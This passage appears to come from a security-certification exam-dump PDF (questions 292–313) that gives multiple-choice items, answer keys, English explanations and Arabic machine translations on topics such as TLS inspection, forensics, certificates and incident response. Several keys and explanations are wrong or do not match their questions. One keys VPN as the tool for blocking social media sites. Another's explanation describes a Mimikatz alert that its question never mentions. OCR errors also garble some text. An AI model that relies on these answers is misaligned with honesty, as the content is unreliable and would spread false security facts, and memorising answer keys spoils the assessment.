‫ المهندس‬CSIRT ‫ قد يخبر‬، ‫ لذلك‬.‫ في الحفاظ على محتويات الذاكرة لتحليل الطب الشرعي وجمع الأدلة‬CSIRT ‫ فقد ترغب‬،
.‫بفصل كبل الشبكة على الفور وعدم القيام بأي شيء آخر لمنع المزيد من فقدان البيانات أو العبث بها‬
292. Which ol the following is required in order (or an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
TLS (Transport Layer Security) is a protocol that is used to encrypt data sent over HTTPS (Hypertext
Transfer Protocol Secure). In order for an intrusion detection system (IDS) and a web application firewall
(WAF) to be effective on HTTPS traffic, they must be able to inspect the encrypted traffic. TLS inspection
allows the IDS and WAF to decrypt and inspect the traffic, allowing them to detect any malicious activity.
TLS ‫؟ فحص‬HTTPS ‫ لتكون فعالة على حركة مرور‬WAF ‫ و‬IDS ‫ما هو المطلوب ما يلي بالترتيب (أو‬
‫ (بروتوكول نقل النص التشعبي‬HTTPS ‫ (أمان طبقة النقل) هو بروتوكول يستخدم لتشفير البيانات المرسلة عبر‬TLS :‫تفسير‬
‫ يجب أن يكونا‬، HTTPS ‫) فعالين على حركة مرور‬WAF( ‫) وجدار حماية تطبيق الويب‬IDS( ‫ لكي يكون نظام كشف التسلل‬.)‫الآمن‬
‫ مما يسمح لهما‬، ‫ بفك تشفير حركة المرور وفحصها‬WAF ‫ و‬IDS ‫ ل‬TLS ‫ يسمح فحص‬.‫قادرين على فحص حركة المرور المشفرة‬
.‫باكتشاف أي نشاط ضار‬
158 / 198
The safer , easier way to help you pass any IT exams.
293. Which Of the following supplies non-repudiation during a forensics investigation?
A. Dumping volatile memory contents first
B. Duplicating a drive With dd
C. a SHA 2 signature of a drive image
D. Logging everyone in contact with evidence
E. Encrypting sensitive data
Answer: C
Explanation:
A SHA 2 signature is a cryptographic hash function that produces a unique and fixed-length output for
any given input. It can provide non-repudiation during a forensics investigation by verifying the integrity
and authenticity of a drive image and proving that it has not been altered or tampered with since it was
created
‫ لصورة محرك أقراص‬2 SHA ‫من الإمدادات التالية عدم التنصل أثناء التحقيق في الطب الشرعي؟ توقيع‬
‫ يمكن أن يوفر عدم التنصل‬.‫ هو دالة تجزئة تشفير تنتج مخرجات فريدة وثابتة الطول لأي إدخال معين‬2 SHA ‫ توقيع‬:‫تفسير‬
‫أثناء التحقيق الجنائي من خلال التحقق من سلامة وصحة صورة محرك الأقراص وإثبات أنه لم يتم تغييرها أو العبث بها منذ‬
‫إنشائها‬
294.A security architect is designing the new outbound internet for a small company. The company would
like all 50 users to share the same single Internet connection. In addition, users will not be permitted to
use social media sites or external email services while at work.
Which of the following should be included in this design to satisfy these requirements? (Select TWO).
A. DLP
B. MAC filtering
C. NAT
D. VPN
E. Content filler
F. WAF
Answer: C,D
Explanation:
NAT (Network Address Translation) is a technology that allows multiple devices to share a single IP
address, allowing them to access the internet while still maintaining security and privacy. VPN (Virtual
Private Network) is a technology that creates a secure, encrypted tunnel between two or more devices,
allowing users to access the internet and other network resources securely and privately. Additionally,
VPNs can also be used to restrict access to certain websites and services, such as social media sites
and external email services.
‫ ترغب الشركة في أن يشارك جميع‬.‫ يقوم مهندس أمني بتصميم شبكة الإنترنت الصادرة الجديدة لشركة صغيرة‬-294
‫ لن يسمح للمستخدمين باستخدام مواقع‬، ‫ بالإضافة إلى ذلك‬.‫ نفس اتصال الإنترنت الفردي‬50 ‫المستخدمين البالغ عددهم‬
‫ أي مما يلي يجب تضمينه في هذا التصميم لتلبية هذه‬.‫التواصل الاجتماعي أو خدمات البريد الإلكتروني الخارجية أثناء العمل‬
‫ نات وفي بي ان‬.)‫المتطلبات؟ (اختر اثنين‬
‫ مما يسمح لها بالوصول إلى‬، ‫ واحد‬IP ‫ (ترجمة عنوان الشبكة) هي تقنية تسمح لأجهزة متعددة بمشاركة عنوان‬NAT :‫تفسير‬
‫ (الشبكة الافتراضية الخاصة) هي تقنية تنشئ نفقا آمنا ومشفرا بين جهازين‬VPN .‫الإنترنت مع الحفاظ على الأمان والخصوصية‬
‫ يمكن‬، ‫ بالإضافة إلى ذلك‬.‫ مما يسمح للمستخدمين بالوصول إلى الإنترنت وموارد الشبكة الأخرى بشكل آمن وخاص‬، ‫أو أكثر‬
‫ مثل مواقع التواصل الاجتماعي وخدمات البريد‬، ‫ لتقييد الوصول إلى مواقع وخدمات معينة‬VPN ‫أيضا استخدام شبكات‬
.‫الإلكتروني الخارجية‬
159 / 198
The safer , easier way to help you pass any IT exams.
295. Which of the following would be the best resource for a software developer who is looking to
improve secure coding practices for web applications?
A. OWASP
B. Vulnerability scan results
C. NIST CSF
D. Third-party libraries
Answer: A
Explanation:
OWASP (Open Web Application Security Project) is a non-profit organization that provides resources
and guidance for improving the security of web applications. It can be the best resource for a software
developer who is looking to improve secure coding practices for web applications by offering various
tools, frameworks, standards, cheat sheets, testing guides, etc., that cover various aspects of web
application security development and testing
‫أي مما يلي سيكون أفضل مورد لمطور البرامج الذي يتطلع إلى تحسين ممارسات الترميز الآمنة لتطبيقات الويب؟ أواسب‬
‫ (مشروع أمان تطبيقات الويب المفتوحة) هي منظمة غير ربحية توفر الموارد والإرشادات لتحسين أمان‬OWASP :‫تفسير‬
‫ يمكن أن يكون أفضل مورد لمطور البرامج الذي يتطلع إلى تحسين ممارسات الترميز الآمنة لتطبيقات الويب‬.‫تطبيقات الويب‬
‫ والتي تغطي جوانب مختلفة‬، ‫من خلال تقديم العديد من الأدوات والأطر والمعايير وأوراق الغش وأدلة الاختبار وما إلى ذلك‬
‫من تطوير واختبار أمان تطبيقات الويب‬
296. Which of the following terms should be included in a contract to help a company monitor the ongoing
security maturity of a new vendor?
A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to kept for a minimum of 30 days
C. Integration of threat intelligence in the companys AV
D. A data-breach clause requiring disclosure of significant data loss
Answer: A
Explanation:
A right-to-audit clause is a contractual provision that allows one party to audit the records and activities
of another party to ensure compliance with security policies and standards. It can help a company
monitor the ongoing security maturity of a new vendor by conducting annual security audits and
identifying any gaps or issues that need to be addressed.
‫أي من الشروط التالية يجب تضمينه في العقد لمساعدة الشركة على مراقبة النضج الأمني المستمر لبائع جديد؟‬
‫بند الحق في التدقيق الذي يسمح بإجراء عمليات تدقيق أمنية سنوية‬
‫ شرط الحق في التدقيق هو حكم تعاقدي يسمح لأحد الأطراف بمراجعة سجلات وأنشطة طرف آخر لضمان الامتثال‬:‫تفسير‬
‫ يمكن أن يساعد الشركة على مراقبة النضج الأمني المستمر للبائع الجديد من خلال إجراء عمليات‬.‫للسياسات والمعايير الأمنية‬
.‫تدقيق أمنية سنوية وتحديد أي ثغرات أو مشكلات تحتاج إلى معالجة‬
160 / 198
The safer , easier way to help you pass any IT exams.
297. An organization has hired a red team to simulate attacks on its security posture, which Of following
will the blue team do after detecting an IOC?
A. Reimage the impacted workstations.
B. Activate runbooks for incident response.
C. Conduct forensics on the compromised system,
D. Conduct passive reconnaissance to gather information
Answer: B
Explanation:
A runbook is a set of predefined procedures and steps that guide an incident response team through the
process of handling a security incident. It can help the blue team respond quickly and effectively to an
indicator of compromise (IOC) by following the best practices and predefined actions for containment,
eradication, recovery and lessons learned.
‫ أي مما يلي سيفعله الفريق الأزرق بعد اكتشاف‬، ‫استأجرت إحدى المنظمات فريقا أحمر لمحاكاة الهجمات على وضعها الأمني‬
.‫اللجنة الأولمبية الدولية؟ تنشيط دفاتر التشغيل للاستجابة للحوادث‬
‫ دفتر التشغيل هو مجموعة من الإجراءات والخطوات المحددة مسبقا التي توجه فريق الاستجابة للحوادث خلال عملية‬:‫تفسير‬
‫) باتباع أفضل‬IOC( ‫ يمكن أن يساعد الفريق الأزرق على الاستجابة بسرعة وفعالية لمؤشر التسوية‬.‫التعامل مع حادث أمني‬
.‫الممارسات والإجراءات المحددة مسبقا للاحتواء والقضاء والتعافي والدروس المستفادة‬
298.A security engineer is investigating a penetration test report that states the company website is
vulnerable to a web application attack. While checking the web logs from the time of the test, the
engineer notices several invalid web form submissions using an unusual address: "SELECT * FROM
customer name”. Which of the following is most likely being attempted?
A. Directory traversal
B. SQL injection
C. Privilege escalation
D. Cross-site scripting
Answer: B
Explanation:
SQL injection is a web application attack that involves inserting malicious SQL statements into an input
field, such as a web form, to manipulate or access the database behind the application. SQL injection
can be used to perform various actions, such as reading, modifying, or deleting data, executing
commands on the database server, or bypassing authentication. In this scenario, the attacker is trying to
use a SQL statement “SELECT * FROM customer name” to retrieve all data from the customer name
table in the database.
‫ ويحقق مهندس أمني في تقرير لاختبار الاختراق ينص على أن موقع الشركة على شبكة الإنترنت معرض لهجوم على‬-298
‫ يلاحظ المهندس العديد من عمليات إرسال نماذج الويب غير‬، ‫ أثناء التحقق من سجلات الويب من وقت الاختبار‬.‫تطبيق ويب‬
SQL ‫ أي مما يلي تتم محاولته على الأرجح؟ حقن‬."‫ اسم العميل‬FROM * SELECT" :‫الصالحة باستخدام عنوان غير عادي‬
‫ لمعالجة قاعدة‬، ‫ مثل نموذج ويب‬، ‫ ضارة في حقل إدخال‬SQL ‫ هو هجوم تطبيق ويب يتضمن إدراج عبارات‬SQL ‫ حقن‬:‫تفسير‬
‫ مثل قراءة البيانات أو‬، ‫ لتنفيذ إجراءات مختلفة‬SQL ‫ يمكن استخدام حقن‬.‫البيانات الموجودة خلف التطبيق أو الوصول إليها‬
‫ يحاول المهاجم استخدام‬،‫ في هذا السيناريو‬.‫تعديلها أو حذفها أو تنفيذ الأوامر على خادم قاعدة البيانات أو تجاوز المصادقة‬
.‫ اسم العميل" لاسترداد كافة البيانات من جدول اسم العميل في قاعدة البيانات‬FROM * SELECT" SQL ‫عبارة‬
161 / 198
The safer , easier way to help you pass any IT exams.
299.A software developer used open-source libraries to streamline development.
Which of the following is the greatest risk when using this approach?
A. Unsecure root accounts
B. Lack of vendor support
C. Password complexity
D. Default settings
Answer: A
‫ أي مما يلي هو أكبر خطر عند استخدام هذا النهج؟ حسابات‬.‫ واستخدم أحد مطوري البرمجيات مكتبات مفتوحة المصدر لتبسيط عملية التنمية‬-299
‫الجذر غير الآمنة‬
300. Which of the following best describes a tool used by an organization to identify, log, and track any
potential risks and corresponding risk information?
A. Quantitative risk assessment
B. Risk register
C. Risk control assessment
D. Risk matrix
Answer: B
Explanation:
A risk register is a tool used by an organization to identify, log, and track any potential risks and
corresponding risk information. It helps to document the risks, their likelihood, impact, mitigation
strategies, and status. A risk register is an essential part of risk management and can be used for
projects or organizations.
‫أي مما يلي يصف بشكل أفضل أداة تستخدمها المؤسسة لتحديد وتسجيل وتتبع أي مخاطر محتملة ومعلومات المخاطر المقابلة؟ سجل المخاطر‬
‫ يساعد على توثيق‬.‫ سجل المخاطر هو أداة تستخدمها المنظمة لتحديد وتسجيل وتتبع أي مخاطر محتملة ومعلومات المخاطر المقابلة‬:‫تفسير‬
‫ يعد سجل المخاطر جزءا أساسيا من إدارة المخاطر ويمكن استخدامه للمشاريع أو‬.‫المخاطر واحتمالاتها وتأثيرها واستراتيجيات التخفيف والحالة‬
.‫المنظمات‬
301. Security engineers are working on digital certificate management with the top priority of making
administration easier.
Which of the following certificates is the best option?
A. User
B. Wildcard
C. Self-signed
D. Root
Answer: B
Explanation:
A wildcard certificate is a type of digital certificate that can be used to secure multiple subdomains under
a single domain name. For example, a wildcard certificate for *.example.com can be used to secure
www.example.com, mail.example.com, blog.example.com, etc. A wildcard certificate can make
administration easier by reducing the number of certificates that need to be issued, managed, and
renewed. It can also save costs and simplify configuration.
‫ أي من الشهادات التالية هو‬.‫يعمل مهندسو الأمن على إدارة الشهادات الرقمية مع إعطاء الأولوية القصوى لتسهيل الإدارة‬
‫الخيار الأفضل؟ بدل‬
‫ شهادة حرف البدل هي نوع من الشهادات الرقمية التي يمكن استخدامها لتأمين نطاقات فرعية متعددة تحت اسم‬:‫تفسير‬
www.example.com ‫ لتأمين‬example.com. * ‫ يمكن استخدام شهادة حرف بدل ل‬، ‫ على سبيل المثال‬.‫مجال واحد‬
‫ يمكن لشهادة أحرف البدل أن تجعل الإدارة أسهل عن طريق تقليل‬.‫ وما إلى ذلك‬blog.example.com mail.example.com
.‫ يمكنه أيضا توفير التكاليف وتبسيط التكوين‬.‫عدد الشهادات التي تحتاج إلى إصدارها وإدارتها وتجديدها‬
162 / 198
The safer , easier way to help you pass any IT exams.
302. Which of the following are common VoIP-associated vulnerabilities? (Select two).
A. SPIM
B. Vishing
C. VLAN hopping
D. Phishing
E. DHCP snooping
F. Tailgating
Answer: A,B
Explanation:
SPIM (Spam over Internet Messaging) is a type of VoIP-associated vulnerability that involves sending
unsolicited or fraudulent messages over an internet messaging service, such as Skype or WhatsApp. It
can trick users into clicking on malicious links, downloading malware, providing personal or financial
information, etc., by impersonating a legitimate entity or creating a sense of urgency or curiosity. Vishing
(Voice Phishing) is a type of VoIP-associated vulnerability that involves making unsolicited or fraudulent
phone calls over an internet telephony service, such as Google Voice or Vonage. It can trick users into
disclosing personal or financial information, following malicious instructions, transferring money, etc., by
using voice spoofing, caller ID spoofing, or interactive voice response systems.
‫ سبيم فيشينغ‬.)‫؟ (حدد اثنين‬VoIP ‫أي مما يلي من الثغرات الأمنية الشائعة المرتبطة ب‬
‫ والتي تتضمن‬VoIP ‫ (البريد العشوائي عبر المراسلة عبر الإنترنت) هو نوع من الثغرات الأمنية المرتبطة ب‬SPIM :‫تفسير‬
‫ يمكنه خداع‬.WhatsApp ‫ أو‬Skype ‫ مثل‬، ‫إرسال رسائل غير مرغوب فيها أو احتيالية عبر خدمة مراسلة عبر الإنترنت‬
‫ عن طريق‬، ‫المستخدمين للنقر على الروابط الضارة أو تنزيل البرامج الضارة أو تقديم معلومات شخصية أو مالية وما إلى ذلك‬
‫ (التصيد الصوتي) هو نوع من الثغرات الأمنية‬Vishing .‫انتحال شخصية كيان شرعي أو خلق شعور بالإلحاح أو الفضول‬
‫ مثل‬، ‫ والتي تتضمن إجراء مكالمات هاتفية غير مرغوب فيها أو احتيالية عبر خدمة هاتفية عبر الإنترنت‬VoIP ‫المرتبطة ب‬
‫ أو اتباع التعليمات الضارة‬، ‫ يمكنه خداع المستخدمين للكشف عن المعلومات الشخصية أو المالية‬.Vonage ‫ أو‬Voice Google
.‫ باستخدام الانتحال الصوتي أو انتحال هوية المتصل أو أنظمة الاستجابة الصوتية التفاعلية‬، ‫ وما إلى ذلك‬، ‫ أو تحويل الأموال‬،
303.A security analyst is concerned about traffic initiated to the dark web from the corporate LAN.
Which of the following networks should the analyst monitor?
A. SFTP
B. AIS
C. Tor
D. loC
Answer: C
Explanation:
Tor (The Onion Router) is a network and a software that enables anonymous communication over the
internet. It routes the traffic through multiple relays and encrypts it at each layer, making it difficult to
trace or monitor. It can access the dark web, which is a part of the internet that is hidden from
conventional search engines and requires special software or configurations to access
‫ أي من الشبكات‬.‫ الخاصة بالشركة‬LAN ‫ يشعر محلل أمني بالقلق إزاء حركة المرور التي تبدأ إلى الويب المظلم من شبكة‬-303
‫التالية يجب أن يراقبها المحلل؟‬
‫ يقوم بتوجيه حركة المرور من‬.‫ (جهاز التوجيه البصلي) عبارة عن شبكة وبرنامج يتيح الاتصال المجهول عبر الإنترنت‬Tor :‫تفسير‬
، ‫ يمكنه الوصول إلى الويب المظلم‬.‫ مما يجعل من الصعب تتبعها أو مراقبتها‬، ‫خلال مرحلات متعددة وتشفيرها في كل طبقة‬
‫وهو جزء من الإنترنت مخفي عن محركات البحث التقليدية ويتطلب برامج أو تكوينات خاصة للوصول إليه‬
163 / 198
The safer , easier way to help you pass any IT exams.
304.A security analyst receives an alert from the company's S1EM that anomalous activity is coming
from a local source IP address of 192 168 34.26 The Chief Information Security Officer asks the analyst
to block the originating source Several days later another employee opens an internal ticket stating that
vulnerability scans are no longer being performed property. The IP address the employee provides is 192
168.34 26. Which of the following describes this type of alert?
A. True positive
B. True negative
C. False positive
D. False negative
Answer: C
Explanation:
A false positive is a type of alert that indicates a security incident when there is none. It can be caused
by misconfigured or overly sensitive security tools or systems that generate false or irrelevant alerts. In
this case, the alert from the company’s SIEM that Mimikatz attempted to run on the remote systems was
a false positive because it was triggered by a legitimate vulnerability scanning tool that uses Mimikatz as
part of its functionality.
‫ يطلب كبير موظفي أمن‬34.26 168 192 ‫ لمصدر محلي‬IP ‫ الخاص بالشركة بأن النشاط الشاذ يأتي من عنوان‬S1EM ‫يتلقى محلل أمني تنبيها من‬.304
‫ يفتح موظف آخر تذكرة داخلية تفيد بأن عمليات فحص الثغرات الأمنية لم تعد قيد‬، ‫المعلومات من المحلل حظر المصدر الأصلي بعد عدة أيام‬
‫ أي مما يلي يصف هذا النوع من التنبيهات؟ إيجابية كاذبة‬.26 168.34 192 ‫ الذي يقدمه الموظف هو‬IP ‫ عنوان‬.‫التنفيذ‬
‫ يمكن أن يكون ناتجا عن أدوات أو أنظمة أمان تم‬.‫ الإيجابية الخاطئة هي نوع من التنبيه يشير إلى حادث أمني عندما لا يكون هناك أي حادث‬:‫تفسير‬
‫ الخاص بالشركة‬SIEM ‫ كان التنبيه الصادر من‬، ‫ في في هذه الحالة‬.‫تكوينها بشكل خاطئ أو شديد الحساسية تنشئ تنبيهات خاطئة أو غير ذات صلة‬
Mimikatz ‫ حاول التشغيل على الأنظمة البعيدة إيجابيا خاطئا لأنه تم تشغيله بواسطة أداة فحص ثغرات أمنية مشروعة تستخدم‬Mimikatz ‫بأن‬
.‫كجزء من وظائفها‬
305.Which of the following procedures would be performed after the root cause of a security incident has
been identified to help avoid future incidents from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
Answer: B
Explanation:
After the root cause of a security incident has been identified, it is important to take the time to analyze
what went wrong and how it could have been prevented. This process is known as “lessons learned” and
allows organizations to identify potential improvements to their security processes and protocols.
Lessons learned typically involve a review of the incident and the steps taken to address it, a review of
the security systems and procedures in place, and an analysis of any potential changes that can be
made to prevent similar incidents from occurring in the future.
‫ما هو الإجراء التالي الذي سيتم تنفيذه بعد تحديد السبب الجذري لحادث أمني للمساعدة في تجنب وقوع حوادث في‬.305
‫المستقبل؟ الدروس المستفادة‬
‫ من المهم أن تأخذ الوقت الكافي لتحليل الخطأ الذي حدث وكيف كان يمكن‬، ‫ بعد تحديد السبب الجذري للحادث الأمني‬:‫تفسير‬
‫ تعرف هذه العملية باسم "الدروس المستفادة" وتسمح للمؤسسات بتحديد التحسينات المحتملة لعملياتها وبروتوكولاتها‬.‫منعه‬
‫ واستعراض النظم والإجراءات‬،‫ وتشمل الدروس المستفادة عادة استعراض الحادث والخطوات المتخذة لمعالجته‬.‫الأمنية‬
.‫ وتحليل أي تغييرات محتملة يمكن إجراؤها لمنع وقوع حوادث مماثلة في المستقبل‬،‫الأمنية المعمول بها‬
164 / 198
The safer , easier way to help you pass any IT exams.
306.A company is developing a new initiative to reduce insider threats.
Which of the following should the company focus on to make the greatest impact?
A. Social media analysis
B. Least privilege
C. Nondisclosure agreements
D. Mandatory vacation
Answer: B
Explanation:
Least privilege is a security principle that states that users and processes should only have the minimum
level of access and permissions required to perform their tasks. This reduces the risk of insider threats
by limiting the potential damage that a malicious or compromised user or process can cause to the
system or data.
‫ أي مما يلي يجب أن تركز عليه الشركة لإحداث‬.‫ وتقوم إحدى الشركات بوضع مبادرة جديدة للحد من التهديدات الداخلية‬-306
‫أكبر تأثير؟ أقل امتياز‬
‫ الامتياز الأقل هو مبدأ أمان ينص على أنه يجب أن يكون لدى المستخدمين والعمليات الحد الأدنى فقط من مستوى‬:‫تفسير‬
‫ هذا يقلل من مخاطر التهديدات الداخلية عن طريق الحد من الضرر المحتمل الذي‬.‫الوصول والأذونات المطلوبة لأداء مهامهم‬
.‫يمكن أن يسببه مستخدم أو عملية ضارة أو مخترقة للنظام أو البيانات‬
307.Which Of the following control types is patch management classified under?
A. Deterrent
B. Physical
C. Corrective
D. Detective
Answer: C
Explanation:
Patch management is a process that involves applying updates or fixes to software to address bugs,
vulnerabilities, or performance issues. Patch management is classified under corrective control type,
which is a type of control that aims to restore normal operations after an incident or event has occurred.
Corrective controls can help mitigate the impact or damage caused by an incident or event and prevent it
from happening again.
‫أي نوع من أنواع التحكم التالية تصنف إدارة التصحيح تحته؟ تصحيحي‬.307
‫ إدارة التصحيح هي عملية تتضمن تطبيق تحديثات أو إصلاحات على البرامج لمعالجة الأخطاء أو نقاط الضعف أو‬:‫تفسير‬
‫ وهو نوع من التحكم يهدف إلى استعادة العمليات‬، ‫ يتم تصنيف إدارة التصحيح ضمن نوع التحكم التصحيحي‬.‫مشكلات الأداء‬
‫ يمكن أن تساعد الضوابط التصحيحية في التخفيف من التأثير أو الضرر الناجم عن حادث أو‬.‫العادية بعد وقوع حادث أو حدث‬
.‫حدث ومنعه من الحدوث مرة أخرى‬
165 / 198
The safer , easier way to help you pass any IT exams.
308.A network security manager wants to implement periodic events that will test the security team's
preparedness for incidents in a controlled and scripted manner.
Which of the following concepts describes this scenario?
A. Red-team exercise
B. Business continuity plan testing
C. Tabletop exercise
D. Functional exercise
Answer: C
Explanation:
A tabletop exercise is a type of security exercise that involves a simulated scenario of a security incident
and a discussion of how the security team would respond to it1. A tabletop exercise is a low-impact and
cost-effective way to test the security team’s preparedness, identify gaps and areas for improvement,
and enhance communication and coordination among team members2. A tabletop exercise is different
from a red-team exercise, which is a simulated attack by an authorized group of ethical hackers to test
the security defenses and response capabilities of an organization3. A business continuity plan testing is
a process of verifying that an organization can continue its essential functions and operations in the
event of a disaster or disruption4. A functional exercise is a type of security exercise that involves a
realistic simulation of a security incident and requires the security team to perform their roles and
responsibilities as if it were a real event.
‫ ويريد مدير أمن الشبكات تنفيذ أحداث دورية تختبر مدى استعداد الفريق الأمني للحوادث بطريقة خاضعة للرقابة‬-308
‫ أي المفاهيم الآتية يصف هذا السيناريو؟ تمرين الطاولة‬.‫ومكتوبة‬
‫ تمرين الطاولة هو نوع من التمارين الأمنية التي تتضمن سيناريو محاكاة لحادث أمني ومناقشة كيفية استجابة‬:‫تفسير‬
، ‫ يعد تمرين الطاولة طريقة منخفضة التأثير وفعالة من حيث التكلفة لاختبار استعداد فريق الأمن‬.1‫فريق الأمان له‬
‫ يختلف تمرين الطاولة عن تمرين‬.2‫ وتعزيز التواصل والتنسيق بين أعضاء الفريق‬، ‫وتحديد الثغرات ومجالات التحسين‬
‫ وهو عبارة عن هجوم محاكاة من قبل مجموعة معتمدة من المتسللين الأخلاقيين لاختبار الدفاعات الأمنية‬،‫الفريق الأحمر‬
‫ اختبار خطة استمرارية الأعمال هو عملية للتحقق من أن المؤسسة يمكنها مواصلة‬.3‫وقدرات الاستجابة للمؤسسة‬
‫ التمرين الوظيفي هو نوع من التمارين الأمنية التي‬.4‫وظائفها وعملياتها الأساسية في حالة وقوع كارثة أو انقطاع‬
.‫تتضمن محاكاة واقعية لحادث أمني وتتطلب من فريق الأمن أداء أدوارهم ومسؤولياتهم كما لو كان حدثا حقيقيا‬
166 / 198
The safer , easier way to help you pass any IT exams.
309.Which of the following processes would most likely help an organization that has conducted an
incident response exercise to improve performance and identify challenges?
A. Lessons learned
B. Identification
C. Simulation
D. Containment
Answer: A
Explanation:
Lessons learned is a process that would most likely help an organization that has conducted an incident
response exercise to improve performance and identify challenges. Lessons learned is a process that
involves reviewing and evaluating the incident response exercise to identify what went well, what went
wrong, and what can be improved. Lessons learned can help an organization enhance its incident
response capabilities, address any gaps or weaknesses, and update its incident response plan
accordingly.
‫أي من العمليات التالية من المرجح أن تساعد المنظمة التي أجرت تمرينا للاستجابة للحوادث على تحسين الأداء وتحديد‬.309
‫التحديات؟ الدروس المستفادة‬
‫ الدروس المستفادة هي عملية من المرجح أن تساعد المنظمة التي أجرت تمرينا للاستجابة للحوادث لتحسين الأداء‬:‫تفسير‬
، ‫ الدروس المستفادة هي عملية تتضمن مراجعة وتقييم تمرين الاستجابة للحوادث لتحديد ما سار بشكل جيد‬.‫وتحديد التحديات‬
‫ يمكن أن تساعد الدروس المستفادة المؤسسة على تعزيز قدراتها على‬.‫ وما الذي يمكن تحسينه‬، ‫وما الخطأ الذي حدث‬
.‫ وتحديث خطة الاستجابة للحوادث ذلك‬، ‫ ومعالجة أي ثغرات أو نقاط ضعف‬، ‫الاستجابة للحوادث‬
310.A company is launching a website in a different country in order to capture user information that a
marketing business can use. The company itself will not be using the information.
Which of the following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
Answer: D
Explanation:
A data collector is a person or entity that collects personal data from individuals for a specific purpose. A
data collector may or may not be the same as the data controller or the data processor, depending on
who determines the purpose and means of processing the data and who actually processes the data.
‫ تقوم إحدى الشركات بإنشاء موقع شبكي في بلد مختلف من أجل الحصول على معلومات المستعملين التي يمكن أن‬-310
‫ أي من الأدوار التالية تتولاها الشركة؟ جامع البيانات‬.‫ الشركة نفسها لن تستخدم المعلومات‬.‫تستخدمها شركة تسويقية‬
‫ قد يكون جامع البيانات أو لا‬.‫ جامع البيانات هو شخص أو كيان يجمع البيانات الشخصية من الأفراد لغرض معين‬:‫التفسير‬
‫ اعتمادا على من يحدد الغرض من معالجة البيانات ووسائلها ومن يعالج‬، ‫يكون هو نفسه مراقب البيانات أو معالج البيانات‬
.‫البيانات بالفعل‬
167 / 198
The safer , easier way to help you pass any IT exams.
311.A company wants to deploy PKI on its internet-facing website.
The applications that are currently deployed are
• www company.com (mam website)
• contact us company com (for locating a nearby location)
• quotes company.com (for requesting a price quote)
The company wants to purchase one SSL certificate that will work for all the existing applications and
any future applications that follow the same naming conventions, such as store company com.
Which of the following certificate types would best meet the requirements?
A. SAN
B. Wildcard
C. Extended validation
D. Self-signed
Answer: B
Explanation:
A wildcard certificate is a type of SSL certificate that can secure multiple subdomains under one domain
name by using an asterisk (*) as a placeholder for any subdomain name. For example, *.company.com
can secure www.company.com, contactus.company.com, quotes.company.com, etc. It can work for all
the existing applications and any future applications that follow the same naming conventions, such as
store.company.com.
‫ التطبيقات التي يتم نشرها‬.‫وتريد إحدى الشركات نشر مرفق المفاتيح العمومية على موقعها الشبكي المواجه للإنترنت‬-311
‫) اتصل بنا شركة كوم (لتحديد موقع قريب) عروض الأسعار‬MAM ‫ (موقع‬company.com ‫حاليا هي شبكة الاتصالات العالمية‬
‫ واحدة تعمل مع جميع التطبيقات الحالية وأي تطبيقات‬SSL ‫ (لطلب عرض أسعار) تريد الشركة شراء شهادة‬company.com
‫ أي من أنواع الشهادات التالية يلبي المتطلبات بشكل‬.com company store ‫ مثل‬، ‫مستقبلية تتبع نفس اصطلاحات التسمية‬
‫أفضل؟ بدل‬
‫ التي يمكنها تأمين نطاقات فرعية متعددة تحت اسم مجال واحد‬SSL ‫ شهادة حرف البدل هي نوع من شهادات‬:‫تفسير‬
‫ تأمين‬company.com. * ‫ يمكن ل‬، ‫ على سبيل المثال‬.‫باستخدام علامة النجمة (*) كعنصر نائب لأي اسم مجال فرعي‬
‫ يمكن أن يعمل مع جميع التطبيقات‬.‫ وما إلى ذلك‬quotes.company.com contactus.company.com www.company.com
.store.company.com ‫ مثل‬، ‫الحالية وأي تطبيقات مستقبلية تتبع نفس اصطلاحات التسمية‬
168 / 198
The safer , easier way to help you pass any IT exams.
312.A government organization is developing an advanced Al defense system. Develop-ers are using
information collected from third-party providers Analysts are no-ticing inconsistencies in the expected
powers Of then learning and attribute the Outcome to a recent attack on one of the suppliers.
Which of the following IS the most likely reason for the inaccuracy of the system?
A. Improper algorithms security
B. Tainted training data
C. virus
D. Cryptomalware
Answer: B
Explanation:
Tainted training data is a type of data poisoning attack that involves modifying or injecting malicious data
into the training dataset of a machine learning or artificial intelligence system. It can cause the system to
learn incorrect or biased patterns and produce inaccurate or malicious outcomes. It is the most likely
reason for the inaccuracy of the system that is using information collected from third-party providers that
have been compromised by an attacker.
‫ يستخدم المطورون المعلومات التي تم جمعها من مزودي الطرف الثالث المحللون لا‬.‫ وتقوم منظمة حكومية بتطوير نظام دفاعي متقدم‬-312
‫ أي مما يلي هو السبب الأكثر احتمالا‬.‫يتوقعون التناقضات في القوى المتوقعة ثم يتعلمون وينسبون النتيجة إلى هجوم حديث على أحد الموردين‬
‫لعدم دقة النظام؟ بيانات التدريب الملوثة‬
‫ بيانات التدريب الملوثة هي نوع من هجمات تسمم البيانات التي تتضمن تعديل أو حقن بيانات ضارة في مجموعة بيانات التدريب الخاصة‬:‫تفسير‬
‫ هذا هو‬.‫ يمكن أن يتسبب في تعلم النظام لأنماط غير صحيحة أو متحيزة وإنتاج نتائج غير دقيقة أو ضارة‬.‫بنظام التعلم الآلي أو الذكاء الاصطناعي‬
.‫السبب الأكثر ترجيحا لعدم دقة النظام الذي يستخدم المعلومات التي تم جمعها من موفري الطرف الثالث الذين تم اختراقهم من قبل المهاجم‬
313.A user enters a password to log in to a workstation and is then prompted to enter an authentication
code. Which of the following MFA factors or attributes are being utilized in the authentication process?
{Selecttwo).
A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you know
E. Something you are
F. Something you can do
Answer: A,B
Explanation:
MFA (Multi-Factor Authentication) is a method of verifying a user’s identity by requiring two or more
factors or attributes that belong to different categories. The categories are something you know (such as
a password or a PIN), something you have (such as a token or a smart card), something you are (such
as a fingerprint or an iris scan), something you do (such as a gesture or a voice command), and
somewhere you are (such as a location or an IP address). In this case, the user enters a password
(something you know) and then receives an authentication code (something you have) to log in to a
workstation.
‫ التالية‬MFA ‫ أي من عوامل أو سمات‬.‫يقوم المستخدم بإدخال كلمة مرور لتسجيل الدخول إلى محطة عمل ثم تتم مطالبته بإدخال رمز مصادقة‬.313
‫ شيء تعرفه _ شيء لديك‬.)‫يتم استخدامها في عملية المصادقة؟ {اختر اثنين‬
